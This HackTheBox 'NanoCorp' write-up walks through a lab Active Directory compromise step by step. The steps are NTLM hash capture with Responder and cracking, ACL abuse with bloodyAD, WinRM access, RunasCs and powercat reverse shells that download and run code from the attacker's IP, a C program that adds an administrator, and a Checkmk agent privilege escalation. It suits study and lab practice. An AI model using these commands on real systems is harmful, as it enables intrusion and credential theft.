WriteupsHTB — NanoCorp
ADMediumWindows
HTB — NanoCorp
MSSQL enumeration with credential discovery, followed by Active Directory privilege escalation through ACL misconfigurations.
November 8, 2025HackTheBox
#MSSQL#AD#ACL Abuse
nmap
sh
nmap -sV -sC -p- -Pn 10.129.243.199 -oN nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-08 23:50 EST
Stats: 0:03:41 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.36% done; ETC: 23:54 (0:00:00 remaining)
Nmap scan report for 10.129.243.199
Host is up (0.019s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://nanocorp.htb/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-09 11:52:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.nanocorp.htb
| Subject Alternative Name: DNS:dc01.nanocorp.htb
| Not valid before: 2025-04-06T22:58:43
|_Not valid after: 2026-04-06T23:18:43
| tls-alpn:
|_ http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
|_ssl-date: TLS randomness does not represent time
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
54191/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
54196/tcp open msrpc Microsoft Windows RPC
54225/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: nanocorp.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-11-09T11:53:39
|_ start_date: N/A
|_clock-skew: 6h59m36s
zip upload
- upload zip to extract hash
- https://github.com/0x6rss/CVE-2025-24071_PoC
sh
responder -I tun0sh
python3 poc.py 130 ↵
Enter your file name: test
Enter IP (EX: 192.168.1.162): 10.10.14.37
completed
sh
responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.37]
Responder IPv6 [dead:beef:2::1023]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-YKE9U8C07QE]
Responder Domain Name [FH4K.LOCAL]
Responder DCE-RPC Port [49565]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.243.199
[SMB] NTLMv2-SSP Username : NANOCORP\web_svc
[SMB] NTLMv2-SSP Hash : web_svc::NANOCORP:2039376b24063147:87319B69E6163F5F4241441FCAC7CBD3:010100000000000080611C685651DC010919FB181C143F5E00000000020008004600480034004B0001001E00570049004E002D0059004B0045003900550038004300300037005100450004003400570049004E002D0059004B004500390055003800430030003700510045002E004600480034004B002E004C004F00430041004C00030014004600480034004B002E004C004F00430041004C00050014004600480034004B002E004C004F00430041004C000700080080611C685651DC0106000400020000000800300030000000000000000000000000200000FACD7B65247A73390894CD232816308BE88223152713F119A77178D8E84162B40A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00330037000000000000000000hashcat
sh
web_svc::NANOCORP:2039376b24063147:87319B69E6163F5F4241441FCAC7CBD3:010100000000000080611C685651DC010919FB181C143F5E00000000020008004600480034004B0001001E00570049004E002D0059004B0045003900550038004300300037005100450004003400570049004E002D0059004B004500390055003800430030003700510045002E004600480034004B002E004C004F00430041004C00030014004600480034004B002E004C004F00430041004C00050014004600480034004B002E004C004F00430041004C000700080080611C685651DC0106000400020000000800300030000000000000000000000000200000FACD7B65247A73390894CD232816308BE88223152713F119A77178D8E84162B40A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00330037000000000000000000sh
hashcat -m 5600 web_svc.ntlmv2 /usr/share/wordlists/rockyou.txt
WEB_SVC::NANOCORP:2039376b24063147:87319b69...:010100000000000080611c685651dc010919fb181c143f5e00000000020008004600480034004b0001001e00570049004e002d0059004b0045003900550038004300300037005100450004003400570049004e002d0059004b004500390055003800430030003700510045002e004600480034004b002e004c004f00430041004c00030014004600480034004b002e004c004f00430041004c00050014004600480034004b002e004c004f00430041004c000700080080611c685651dc0106000400020000000800300030000000000000000000000000200000facd7b65247a73390894cd232816308be88223152713f119a77178d8e84162b40a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00330037000000000000000000:dksehdgh712!@#creds
sh
nxc smb 10.129.243.199 -u web_svc -p 'dksehdgh712!@#'
SMB 10.129.243.199 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.243.199 445 DC01 [+] nanocorp.htb\web_svc:dksehdgh712!@# bloodhound collector
sh
bloodhound-python -u 'web_svc' -p 'dksehdgh712!@#' -ns 10.129.243.199 -d nanocorp.htb -c allsh
zip -r nanocorp.zip *.jsonAddSelf
- bloodyad worked to add to it_support
sh
bloodyAD --host "10.129.243.199" -d "nanocorp.htb" -u "web_svc" -p 'dksehdgh712!@#' add groupMember "it_support" "web_svc"
[+] web_svc added to it_support
sh
net rpc group members "it_support" -U "nanocorp"/"web_svc"%'dksehdgh712!@#' -S "nanocorp.htb"
NANOCORP\web_svcForceChangePassword
sh
bloodyAD --host "10.129.243.199" -d "nanocorp.htb" -u "web_svc" -p 'dksehdgh712!@#' set password "monitoring_svc" 'dksehdgh712!@#'
[+] Password changed successfully!- need to change the password similar to the web_svc for password policy requirements
sh
sudo ntpdate 10.129.243.199 && nxc smb 10.129.243.199 -u monitoring_svc -p 'dksehdgh712!@#' -k
2025-11-09 21:06:30.824755 (-0500) -0.002329 +/- 0.008283 10.129.243.199 s1 no-leap
SMB 10.129.243.199 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.243.199 445 DC01 [+] nanocorp.htb\monitoring_svc:dksehdgh712!@# password policy
sh
nxc smb 10.129.1.158 -u web_svc -p 'dksehdgh712!@#' --pass-pol
SMB 10.129.1.158 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.1.158 445 DC01 [+] nanocorp.htb\web_svc:dksehdgh712!@#
SMB 10.129.1.158 445 DC01 [+] Dumping password info for domain: NANOCORP
SMB 10.129.1.158 445 DC01 Minimum password length: 7
SMB 10.129.1.158 445 DC01 Password history length: 24
SMB 10.129.1.158 445 DC01 Maximum password age: 41 days 23 hours 53 minutes
SMB 10.129.1.158 445 DC01
SMB 10.129.1.158 445 DC01 Password Complexity Flags: 000001
SMB 10.129.1.158 445 DC01 Domain Refuse Password Change: 0
SMB 10.129.1.158 445 DC01 Domain Password Store Cleartext: 0
SMB 10.129.1.158 445 DC01 Domain Password Lockout Admins: 0
SMB 10.129.1.158 445 DC01 Domain Password No Clear Change: 0
SMB 10.129.1.158 445 DC01 Domain Password No Anon Change: 0
SMB 10.129.1.158 445 DC01 Domain Password Complex: 1
SMB 10.129.1.158 445 DC01
SMB 10.129.1.158 445 DC01 Minimum password age: 1 day 4 minutes
SMB 10.129.1.158 445 DC01 Reset Account Lockout Counter: 30 minutes
SMB 10.129.1.158 445 DC01 Locked Account Duration: 30 minutes
SMB 10.129.1.158 445 DC01 Account Lockout Threshold: None
SMB 10.129.1.158 445 DC01 Forced Log off Time: Not Setsh
ntpdate 10.129.1.158 && impacket-getTGT nanocorp.htb/web_svc:'dksehdgh712!@#'sh
ntpdate 10.129.243.199 && impacket-getTGT nanocorp.htb/monitoring_svc:'dksehdgh712!@#'
2025-11-09 21:16:34.561987 (-0500) +25199.147576 +/- 0.037085 10.129.243.199 s1 no-leap
CLOCK: time stepped by 25199.147576
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Saving ticket in monitoring_svc.ccachesh
export KRB5CCNAME=/opt/winrmexec/web_svc.ccachesh
export KRB5CCNAME=/opt/winrmexec/monitoring_svc.ccachesh
sudo ntpdate 10.129.243.199 && nxc smb 10.129.243.199 -u monitoring_svc -p 'dksehdgh712!@#' -k
2025-11-09 21:06:30.824755 (-0500) -0.002329 +/- 0.008283 10.129.243.199 s1 no-leap
SMB 10.129.243.199 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.243.199 445 DC01 [+] nanocorp.htb\monitoring_svc:dksehdgh712!@#
sh
export KRB5CCNAME=/home/sake/htb/seasonal/NanoCorp/monitoring_svc.ccachewinrm
sh
ntpdate 10.129.243.199 && python3 evil_winrmexec.py -k -no-pass -ssl dc01.nanocorp.htb 1 ↵
2025-11-11 01:05:15.609736 (-0500) +25200.976278 +/- 0.008074 10.129.243.199 s1 no-leap
CLOCK: time stepped by 25200.976278
[*] '-target_ip' not specified, using dc01.nanocorp.htb
[*] '-port' not specified, using 5986
[*] '-url' not specified, using https://dc01.nanocorp.htb:5986/wsman
[*] using domain and username from ccache: NANOCORP.HTB\monitoring_svc
[*] '-spn' not specified, using HTTP/dc01.nanocorp.htb@NANOCORP.HTB
[*] '-dc-ip' not specified, using NANOCORP.HTB
[*] requesting TGS for HTTP/dc01.nanocorp.htb@NANOCORP.HTB
Ctrl+D to exit, Ctrl+C will try to interrupt the running pipeline gracefully
This is not an interactive shell! If you need to run programs that expect
inputs from stdin, or exploits that spawn cmd.exe, etc., pop a !revshell
Special !bangs:
!download RPATH [LPATH] # downloads a file or directory (as a zip file); use 'PATH'
# if it contains whitespace
!upload [-xor] LPATH [RPATH] # uploads a file; use 'PATH' if it contains whitespace, though use iwr
# if you can reach your ip from the box, because this can be slow;
# use -xor only in conjunction with !psrun/!netrun
!amsi # amsi bypass, run this right after you get a prompt
!psrun [-xor] URL # run .ps1 script from url; uses ScriptBlock smuggling, so no !amsi patching is
# needed unless that script tries to load a .NET assembly; if you can't reach
# your ip, !upload with -xor first, then !psrun -xor 'c:\foo\bar.ps1' (needs absolute path)
!netrun [-xor] URL [ARG] [ARG] # run .NET assembly from url, use 'ARG' if it contains whitespace;
# !amsi first if you're getting '...program with an incorrect format' errors;
# if you can't reach your ip, !upload with -xor first then !netrun -xor 'c:\foo\bar.exe' (needs absolute path)
!revshell IP PORT # pop a revshell at IP:PORT with stdin/out/err redirected through a socket; if you can't reach your ip and you
# you need to run an executable that expects input, try:
# PS> Set-Content -Encoding ASCII 'stdin.txt' "line1`nline2`nline3"
# PS> Start-Process some.exe -RedirectStandardInput 'stdin.txt' -RedirectStandardOutput 'stdout.txt'
!log # start logging output to winrmexec_[timestamp]_stdout.log
!stoplog # stop logging output to winrmexec_[timestamp]_stdout.log
PS C:\Users\monitoring_svc\Documents> whoami
nanocorp\monitoring_svc
user.txt
sh
PS C:\Users\monitoring_svc\Desktop> cat user.txt
4a4a0138...privilege escalation
checkmk
- https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/
powershell
PS C:\Program Files (x86)> ls
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/5/2025 4:17 PM checkmk
d----- 5/8/2021 1:34 AM Common Files
d----- 11/3/2025 4:13 PM Internet Explorer
d----- 5/8/2021 2:40 AM Microsoft
d----- 5/8/2021 1:34 AM Microsoft.NET
d----- 5/8/2021 2:35 AM Windows Defender
d----- 11/3/2025 4:13 PM Windows Mail
d----- 11/3/2025 4:13 PM Windows Media Player
d----- 5/8/2021 2:35 AM Windows NT
d----- 11/3/2025 4:13 PM Windows Photo Viewer
d----- 5/8/2021 1:34 AM WindowsPowerShellwinpeas
sh
PS C:\Users\monitoring_svc\Documents> Invoke-WebRequest http://10.10.14.37/winPEASx64.exe -OutFile winPEASx64.exerunas
sh
PS C:\Users\monitoring_svc\Documents> Invoke-WebRequest http://10.10.14.37/RunasCs.exe -OutFile RunasCs.exepowershell
PS C:\Users\monitoring_svc\Documents> .\RunasCs.exe "web_svc" 'dksehdgh712!@#' powershell.exe -r 10.10.14.37:1234powershell
PS C:\Users\monitoring_svc\Documents> .\RunasCs.exe "monitoring_svc" 'dksehdgh712!@#' powershell.exe -r 10.10.14.37:445powershell
PS C:\Windows\system32> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
Name State PathName
---- ----- --------
ADWS Running C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
BFE Running C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
BrokerInfrastructure Running C:\Windows\system32\svchost.exe -k DcomLaunch -p
camsvc Running C:\Windows\system32\svchost.exe -k appmodel -p
CDPSvc Running C:\Windows\system32\svchost.exe -k LocalService -p
CertPropSvc Running C:\Windows\system32\svchost.exe -k netsvcs
CheckmkService Running "C:\Program Files (x86)\checkmk\service\check_mk_agent.exe" - version 2.1
sh
PS C:\programdata> cat cmk_agent_uninstall.txt
cat cmk_agent_uninstall.txt
Checkmk monitoring agent service - 2.1, 64-bit
mal.c
c
#include <stdlib.h>
int main ()
{
int i;
i = system ("net localgroup administrators web_svc /add");
return 0;
}sh
x86_64-w64-mingw32-gcc mal.c -o mal.exepowershell
PS C:\users\web_svc\desktop> Invoke-WebRequest http://10.10.14.37/mal.exe -OutFile mal.exepowershell
1..30000 | foreach { copy C:\users\monitoring_svc\documents\mal.exe C:\Windows\Temp\cmk_all_${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true; }powershell
10000..30000 | foreach { copy C:\users\web_svc\mal.exe C:\Windows\Temp\cmk_all_${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true; }powershell
PS C:\windows\temp> msiexec /fa C:\Windows\Installer\1e6f2.msipowershell
PS C:\windows\installer> Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\*\InstallProperties' | Select-Object DisplayName, LocalPackage | Where-Object { $_.DisplayName } | Sort-Object DisplayName
Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\*\InstallProperties' | Select-Object DisplayName, LocalPackage | Where-Object { $_.DisplayName } | Sort-Object DisplayName
DisplayName LocalPackage
----------- ------------
Check MK Agent 2.1 C:\Windows\Installer\1e6f2.msi
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 C:\Windows\Installer\387ce.msi
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 C:\Windows\Installer\387ca.msi
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 C:\Windows\Installer\387c6.msi
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 C:\Windows\Installer\387c2.msi
VMware Tools sh
PS C:\windows\temp> ls
ls
Directory: C:\windows\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2025 5:05 PM vmware-SYSTEM
-a---- 11/10/2025 7:06 PM 53 af397ef2....db.ses
-a---- 11/11/2025 3:49 AM 250202 checkmk_repair.log
-a---- 11/11/2025 2:46 AM 115532 cmk_all_3128_0.cmd sh
PS C:\windows\temp> icacls cmk_all_3128_0.cmd
icacls cmk_all_3128_0.cmd
cmk_all_3128_0.cmd BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NANOCORP\web_svc:(I)(F)sh
PS C:\windows\temp> copy C:\users\web_svc\desktop\mal.exe cmk_all_3128_0.cmd
powershell
IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.37/powercat.ps1');powercat -c 10.10.14.37 -p 443 -e cmdpowershell
PS C:\Users\monitoring_svc\Documents> Invoke-WebRequest http://10.10.14.37/root.bat -OutFile root.batpowershell
PS C:\Users\monitoring_svc\Documents> 1..30000 | foreach { copy C:\Users\monitoring_svc\Documents\root.bat C:\Windows\Temp\cmkall${_}_1.cmd; Set-ItemProperty -path C:\Windo
ws\Temp\cmkall${_}_1.cmd -name IsReadOnly -value $true; }powershell
PS C:\windows\temp> msiexec /fa C:\Windows\Installer\1e6f2.msi powershell
PS C:\Users\monitoring_svc\Documents> 1..30000 | foreach { copy C:\Users\monitoring_svc\Documents\test.bat C:\Windows\Temp\cmkall${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmkall${_}_1.cmd -name IsReadOnly -value $true; }powershell
PS C:\windows\temp> ls
ls
Directory: C:\windows\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2025 5:05 PM vmware-SYSTEM
-a---- 11/11/2025 4:44 PM 53 af397ef2....db.ses
-a---- 11/11/2025 4:47 PM 1069 cmk_all_2704_1.cmd
-a---- 11/11/2025 4:47 PM 423 cmk_data_2704_2.cmd
-a---- 11/11/2025 4:44 PM 0 mat-debug-5756.log powershell
1..20000 | foreach { copy C:\Users\monitoring_svc\Documents\root.bat C:\Windows\Temp\cmk_all_${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true; }powershell
1..20000 | foreach { copy C:\Users\monitoring_svc\Documents\root.bat C:\Windows\Temp\cmk_data_${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_data_${_}_1.cmd -name IsReadOnly -value $true; }powershell
PS C:\users\web_svc> ls
ls
Directory: C:\users\web_svc
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 4/5/2025 4:14 PM 3D Objects
d-r--- 4/5/2025 4:14 PM Contacts
d-r--- 4/9/2025 12:51 AM Desktop
d-r--- 4/5/2025 4:14 PM Documents
d-r--- 4/5/2025 4:14 PM Downloads
d-r--- 4/5/2025 4:14 PM Favorites
d-r--- 4/9/2025 12:26 AM Links
d-r--- 4/5/2025 4:14 PM Music
d-r--- 4/5/2025 4:14 PM Pictures
d-r--- 4/5/2025 4:14 PM Saved Games
d-r--- 4/5/2025 4:14 PM Searches
d-r--- 4/5/2025 4:14 PM Videos
-a---- 11/11/2025 4:43 PM 34 root.txt root.txt
powershell
PS C:\users\web_svc> cat root.txt
cat root.txt
2877f505...Up next
MediumNov 2025
HTB — Signed
MSSQL with xp_cmdshell for initial RCE. Active Directory certificate abuse (ADCS) to impersonate Domain Admin.
Read writeup
MediumDec 2025
HTB — TombWatcher
Active Directory with ADCS misconfiguration. ESC1 certificate template abuse allows requesting a certificate as Domain Admin for full compromise.
Read writeup
MediumJan 2026
HTB — Haze
Splunk misconfiguration leaks credentials. Active Directory enumeration reveals a privilege escalation path through ACL abuse to Domain Admin.
Read writeup